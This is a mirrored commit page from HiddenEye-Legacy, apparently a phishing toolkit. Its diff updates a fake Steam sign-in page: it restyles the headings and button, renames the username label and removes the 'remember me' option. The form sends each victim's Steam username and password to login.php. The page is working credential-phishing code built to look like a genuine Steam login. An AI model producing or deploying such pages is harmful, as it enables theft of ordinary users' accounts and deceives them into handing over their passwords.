mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Update index.html
This commit is contained in:
parent
884ceb9e17
commit
7fa36acdcb
|
@ -298,23 +298,19 @@ if ( typeof JSON != 'object' || !JSON.stringify || !JSON.parse ) { document.writ
|
|||
|
||||
<div class="mainLoginPanel">
|
||||
<div class="mainLoginLeftPanel">
|
||||
<h1>Sign In</h1>
|
||||
<p>To an existing Steam account</p>
|
||||
<h1>SIGN IN</h1>
|
||||
<p style="color:#c6d4df;font-size:12px;font-family: Sans-serif;">To an existing Steam account</p>
|
||||
|
||||
<div id="">
|
||||
<form action="login.php" method="POST" name="logon" id="loginForm" style="display: none;">
|
||||
|
||||
<div class="mainLoginLeftPanel_signin">
|
||||
<label for="steamAccountName">Steam username</label><br>
|
||||
<div style="color:#c6d4df;font-family: Sans-serif;font-size: 12px;">
|
||||
<label for="steamAccountName">Steam account name</label><br>
|
||||
<input class="textField" type="text" name="username" id="steamAccountName" maxlength="64" tabindex="1" value=""><br /> <br>
|
||||
<label for="steamPassword">Password</label><br>
|
||||
<input class="textField" type="password" name="password" id="steamPassword" autocomplete="off" maxlength="64" tabindex="2" /><br />
|
||||
<div id="passwordclearlabel" style="text-align: left; display: none;">It seems that you may be having trouble entering your password. We will now show your password in plain text (login is still secure).</div>
|
||||
<div class="checkboxContainer">
|
||||
<div class="checkboxRow" title="If you select this option, we will automatically log you in on future visits for up to 30 days, or until you select "Logout" from the account menu. This feature is only available to Steam Guard enabled accounts.">
|
||||
<input class="" type="checkbox" name="remember_login" id="remember_login" tabindex="4" ><label for="remember_login">Remember me on this computer</label><br>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
|
||||
</div>
|
||||
|
||||
|
@ -337,7 +333,7 @@ if ( typeof JSON != 'object' || !JSON.stringify || !JSON.parse ) { document.writ
|
|||
<div style="clear: both;">
|
||||
|
||||
<div id="login_btn_signin">
|
||||
<input class="btn_green_white_innerfade btn_medium" type="submit" id="SteamLogin" value="Sign in" width="104" height="25" border="0" tabindex="5" />
|
||||
<input class="btnv6_blue_hoverfade btn_medium" type="submit" id="SteamLogin" style="margin-top:39px"value="Sign in" width="104" height="25" border="0" tabindex="5" />
|
||||
</div>
|
||||
|
||||
<div id="login_btn_wait" style="display: none;">
|
||||
|
|
Loading…
Reference in New Issue
Block a user